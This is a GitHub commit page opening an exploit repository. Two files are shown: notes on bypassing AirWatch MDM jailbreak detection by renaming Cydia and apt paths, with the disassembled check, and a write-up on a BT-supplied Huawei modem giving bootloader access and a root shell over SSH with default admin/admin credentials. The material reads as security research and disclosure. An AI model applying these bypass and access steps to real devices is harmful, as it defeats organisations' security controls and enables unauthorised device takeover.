Skip to content

Commit 3fbdb9d

Browse files
covecreditcovecredit
committed
Hacker House exploit repository
0 parents  commit 3fbdb9d

File tree

137 files changed

+11709
-0
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

137 files changed

+11709
-0
lines changed

AirWatchMDMJailbreakBypass.txt

Lines changed: 123 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,123 @@
1+
AirWatch MDM solution has "jailbreak" detection, the binary was decrypted and disassembled to
2+
identify how the detection works. It was found this detection was shit (technical term) and
3+
could be bypassed using the following exploits.
4+
5+
Rename /Applications/Cydia.app and /etc/apt or alternatively modify one byte of the string
6+
in a decrypted binary and repack to run on a jailbroken device.
7+
8+
For lulz the vulnerable function is shown here.
9+
10+
-- prdelka (13/11/12)
11+
12+
__text:00062A14 ; =============== S U B R O U T I N E =======================================
13+
__text:00062A14
14+
__text:00062A14 ; Attributes: bp-based frame
15+
__text:00062A14
16+
__text:00062A14 sub_62A14 ; DATA XREF: -[AWCompromiseDetection detectCompromiseStatus]+9Ao
17+
__text:00062A14 ; -[AWCompromiseDetection detectCompromiseStatus]+B6o
18+
__text:00062A14
19+
__text:00062A14 var_28 = -0x28
20+
__text:00062A14 var_24 = -0x24
21+
__text:00062A14 var_20 = -0x20
22+
__text:00062A14 var_1C = -0x1C
23+
__text:00062A14
24+
__text:00062A14 PUSH {R4-R7,LR}
25+
__text:00062A16 ADD R7, SP, #0xC
26+
__text:00062A18 PUSH.W {R8,R10,R11}
27+
__text:00062A1C SUB SP, SP, #0x10
28+
__text:00062A1E MOV R10, R0
29+
__text:00062A20 MOV R5, R2
30+
__text:00062A22 UXTB R0, R1
31+
__text:00062A24 CMP R0, #1
32+
__text:00062A26 IT EQ
33+
__text:00062A28 CMPEQ R5, #0
34+
__text:00062A2A BNE.W loc_62B4C
35+
__text:00062A2E MOV R1, (selRef_defaultManager - 0x62A42) ; selRef_defaultManager
36+
__text:00062A36 MOV R0, (classRef_NSFileManager - 0x62A44) ; classRef_NSFileManager
37+
__text:00062A3E ADD R1, PC ; selRef_defaultManager
38+
__text:00062A40 ADD R0, PC ; classRef_NSFileManager
39+
__text:00062A42 LDR R1, [R1] ; "defaultManager"
40+
__text:00062A44 LDR R0, [R0] ; _OBJC_CLASS_$_NSFileManager
41+
__text:00062A46 BLX _objc_msgSend
42+
__text:00062A4A MOV R4, R0
43+
__text:00062A4C MOV R0, (selRef_fileExistsAtPath_ - 0x62A5C) ; selRef_fileExistsAtPath_
44+
__text:00062A54 MOVW R2, #0xC80E
45+
__text:00062A58 ADD R0, PC ; selRef_fileExistsAtPath_
46+
__text:00062A5A MOVT.W R2, #0x13
47+
__text:00062A5E ADD R2, PC ; "/Applications/Cydia.app"
48+
__text:00062A60 LDR R5, [R0] ; "fileExistsAtPath:"
49+
__text:00062A62 MOV R0, R4
50+
__text:00062A64 MOV R1, R5
51+
__text:00062A66 BLX _objc_msgSend
52+
__text:00062A6A STR R0, [SP,#0x28+var_1C]
53+
__text:00062A6C MOVW R2, #0xC804
54+
__text:00062A70 MOV R0, R4
55+
__text:00062A72 MOVT.W R2, #0x13
56+
__text:00062A76 MOV R1, R5
57+
__text:00062A78 ADD R2, PC ; "/etc/apt/"
58+
__text:00062A7A MOVS R4, #4
59+
__text:00062A7C BLX _objc_msgSend
60+
__text:00062A80 STR R0, [SP,#0x28+var_20]
61+
__text:00062A82 MOVW R1, #0x487C
62+
__text:00062A86 MOVS R3, #0
63+
__text:00062A88 MOVT.W R1, #0x13
64+
__text:00062A8C MOV R0, (cfstr_Test - 0x62AA4) ; "test"
65+
__text:00062A94 MOVW R2, #0xC7E8
66+
__text:00062A98 ADD R1, PC ; selRef_writeToFile_atomically_encoding_error_
67+
__text:00062A9A MOVT.W R2, #0x13
68+
__text:00062A9E STR R4, [SP,#0x28+var_28]
69+
__text:00062AA0 ADD R0, PC ; "test"
70+
__text:00062AA2 STR R3, [SP,#0x28+var_24]
71+
__text:00062AA4 ADD R2, PC ; "/var/mobile/mobile.dat"
72+
__text:00062AA6 LDR R1, [R1] ; "writeToFile:atomically:encoding:error:"
73+
__text:00062AA8 MOVS R3, #0
74+
__text:00062AAA BLX _objc_msgSend
75+
__text:00062AAE MOV R11, R0
76+
__text:00062AB0 BLX _fork
77+
__text:00062AB4 MOV R6, R0
78+
__text:00062AB6 CMP R6, #0
79+
__text:00062AB8 BEQ.W loc_62CC8
80+
__text:00062ABC MOV R1, (selRef_delegate - 0x62ACC) ; selRef_delegate
81+
__text:00062AC4 LDR.W R0, [R10,#0x14]
82+
__text:00062AC8 ADD R1, PC ; selRef_delegate
83+
__text:00062ACA LDR.W R8, [R1] ; "delegate"
84+
__text:00062ACE MOV R1, R8
85+
__text:00062AD0 BLX _objc_msgSend
86+
__text:00062AD4 MOV R1, (selRef_respondsToSelector_ - 0x62AE8) ; selRef_respondsToSelector_
87+
__text:00062ADC MOV R2, (selRef_compromiseDetection_succeededWithResponse_ - 0x62AEA) ; selRef_compromiseDetection_succeededWithResponse_
88+
__text:00062AE4 ADD R1, PC ; selRef_respondsToSelector_
89+
__text:00062AE6 ADD R2, PC ; selRef_compromiseDetection_succeededWithResponse_
90+
__text:00062AE8 LDR R1, [R1] ; "respondsToSelector:"
91+
__text:00062AEA LDR R5, [R2] ; "compromiseDetection:succeededWithRespon"...
92+
__text:00062AEC MOV R2, R5
93+
__text:00062AEE BLX _objc_msgSend
94+
__text:00062AF2 TST.W R0, #0xFF
95+
__text:00062AF6 BEQ.W loc_62CC0
96+
__text:00062AFA LDR.W R0, [R10,#0x14]
97+
__text:00062AFE MOV R1, R8
98+
__text:00062B00 BLX _objc_msgSend
99+
__text:00062B04 MOVS R4, #0
100+
__text:00062B06 MOVW R9, #0xF4B4
101+
__text:00062B0A CMP R6, #1
102+
__text:00062B0C MOVT.W R9, #0x13
103+
__text:00062B10 MOV R1, (selRef_performSelector_withObject_ - 0x62B1E) ; selRef_performSelector_withObject_
104+
__text:00062B18 ADD R9, PC ; "Not Compromised"
105+
__text:00062B1A ADD R1, PC ; selRef_performSelector_withObject_
106+
__text:00062B1C MOV.W R6, #0
107+
__text:00062B20 IT LT
108+
__text:00062B22 MOVLT R6, #1
109+
__text:00062B24 LDR R2, [SP,#0x28+var_1C]
110+
__text:00062B26 LDR R3, [SP,#0x28+var_20]
111+
__text:00062B28 LDR R1, [R1] ; "performSelector:withObject:"
112+
__text:00062B2A ORRS R2, R3
113+
__text:00062B2C MOV R3, (cfstr_Compromised - 0x62B3C) ; "Compromised"
114+
__text:00062B34 ORR.W R2, R2, R11
115+
__text:00062B38 ADD R3, PC ; "Compromised"
116+
__text:00062B3A TST.W R2, #0xFF
117+
__text:00062B3E IT EQ
118+
__text:00062B40 MOVEQ R4, #1
119+
__text:00062B42 TST R4, R6
120+
__text:00062B44 IT NE
121+
__text:00062B46 MOVNE R3, R9
122+
__text:00062B48 MOV R2, R5
123+
__text:00062B4A B loc_62CBC

BTCPE.txt

Lines changed: 130 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,130 @@
1+
[fantastic@localhost BT]$ cat notes.txt
2+
### ### ######## ######## ######## ########
3+
## #### ### ### ######## ######## ########
4+
## # ### # # # # ## # ### # # ##
5+
# # ## ### ### ## # # # # # #
6+
# # # ### ### # ## # # # ## #
7+
# ## # ### # # # ## ## # # ## #
8+
# # ## #### ## # ##### ## # # # ##
9+
######## ######## #### ######## ########
10+
Another sad story inside the world of consumer insecurities, this time
11+
a look at the British Telecom provided "infinity" CPE. BT provide two
12+
pieces of equipment, one is the flagship BTHub3 which provides WiFi
13+
and user networking the other is a Huawei DSL modem for provisioning
14+
internet to the hub. This is a look inside the Huawei modem, where it
15+
was discovered a JTAG and UART pin-out were provided and cleanly
16+
labelled near the main CPU as two blocks of 5 pins, allowing a 10pin
17+
header to be soldered to the device. It was discovered that the UART
18+
provides the serialoutput of the device during boot and it is possible
19+
to interact with the bootloader from then on. A BusPirate was used in
20+
the making of this movie.
21+
22+
The BootLoader identifies itself during POST as the following, identifying
23+
also the chipset type and versions in use:
24+
25+
CFE version 1.0.37-102.6 for BCM96368 (32bit,SP,BE)
26+
Build Date: Tue Apr 13 14:47:58 CST 2010 (root@g40420m)
27+
Copyright (C) 2000-2008 Broadcom Corporation.
28+
29+
Parallel flash device: name AM29LV320MT, id 0x2201, size 8192KB
30+
CPU type 0x2A031: 400MHz, Bus: 160MHz, Ref: 64MHz
31+
CPU running TP0
32+
Total memory: 33554432 bytes (32MB)
33+
Boot Address 0xb8000000
34+
35+
With access to the bootloader obtained, an attacker can halt the
36+
boot process and make use of the bootloader to modify the boot
37+
parameters, additionally they may reprogram the MAC address of the
38+
device to arbitrary values using the "b" Change board parameters
39+
40+
CFE> help
41+
Available commands:
42+
43+
sm Set memory or registers.
44+
dm Dump memory or registers.
45+
w Write the whole image start from beginning of the flash
46+
e Erase [n]vram or [a]ll flash except bootrom
47+
r Run program from flash image or from host depend on [f/h] fg
48+
p Print boot line and board parameter info
49+
c Change booline parameters
50+
f Write image to the flash
51+
i Erase persistent storage data
52+
b Change board parameters
53+
reset Reset the board
54+
flashimage Flashes a compressed image after the bootloader.
55+
help Obtain help for CFE commands
56+
57+
For more information about a command, enter 'help command-name'
58+
*** command status = 0
59+
CFE>
60+
61+
62+
After booting the modem runs a restrictive Huwaei configuration shell
63+
that can be used for basic diagnositics and Administrative tasks. The
64+
default username and password is "admin" / "admin". After authentication
65+
you can execute a limited BusyBox ash shell using the "shell" command:
66+
67+
68+
Welcome Visiting Huawei Home Gateway
69+
Copyright by Huawei Technologies Co., Ltd.
70+
Login:admin
71+
Password:
72+
ATP>shell
73+
74+
75+
BusyBox v1.9.1 (2010-10-15 17:59:06 CST) built-in shell (ash)
76+
Enter 'help' for a list of built-in commands.
77+
78+
#
79+
80+
Alarmingly, the BT ADSL router device is configured in an out-of-the
81+
box configuration state to be remotely managed and controlled by unknown
82+
parties. The following netstat output shows that "tftp", "ssh" and "telnet"
83+
management services are running with full root privileges and listening
84+
on network interfaces, which are configured as bridges to physical
85+
connections:
86+
87+
# netstat -an
88+
Active Internet connections (servers and established)
89+
Proto Recv-Q Send-Q Local Address Foreign Address State
90+
tcp 0 0 0.0.0.0:161 0.0.0.0:* LISTEN
91+
tcp 0 0 127.0.0.1:2600 0.0.0.0:* LISTEN
92+
tcp 0 0 127.0.0.1:8011 0.0.0.0:* LISTEN
93+
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
94+
tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN
95+
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
96+
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
97+
tcp 0 0 127.0.0.1:2600 127.0.0.1:33287 ESTABLISHED
98+
tcp 0 0 127.0.0.1:33287 127.0.0.1:2600 ESTABLISHED
99+
udp 0 0 0.0.0.0:161 0.0.0.0:*
100+
udp 0 0 0.0.0.0:53 0.0.0.0:*
101+
udp 0 0 0.0.0.0:69 0.0.0.0:*
102+
103+
By reconfiguring the network connection it was discovered that an attacker
104+
could authenticate to the limited shell using the default "admin" shell
105+
and gain access to the device over a network interface:
106+
107+
[fantastic@localhost ro]$ ssh -l admin 192.168.2.1
108+
[email protected]'s password:
109+
PTY allocation request failed on channel 0
110+
111+
ATP>shell
112+
shell
113+
114+
115+
BusyBox v1.9.1 (2010-10-15 17:59:06 CST) built-in shell (ash)
116+
Enter 'help' for a list of built-in commands.
117+
118+
#
119+
120+
network traffic rules indicate that this is intended to be restrictive
121+
functionality and only reachable from an upstream ISP providor - however
122+
with such an insecure password security does not seem to be a primary
123+
concern. Additionally a "BTAgent" process and configuration directory
124+
has been identified which appears to be a network management agent that
125+
performs polling for upstream firmware (to allow the device to be
126+
reflashed) and may also contain security vulnerabilities that could
127+
allow reprogramming of the device from a remote location. These
128+
files consist of a number of libraries and binaries and appear to make
129+
some use of PKI although this maybe just to validate a firmware
130+
image file as opposed to authentication.

CVE-2012-4681.tgz

2.22 KB
Binary file not shown.

0 commit comments

Comments
 (0)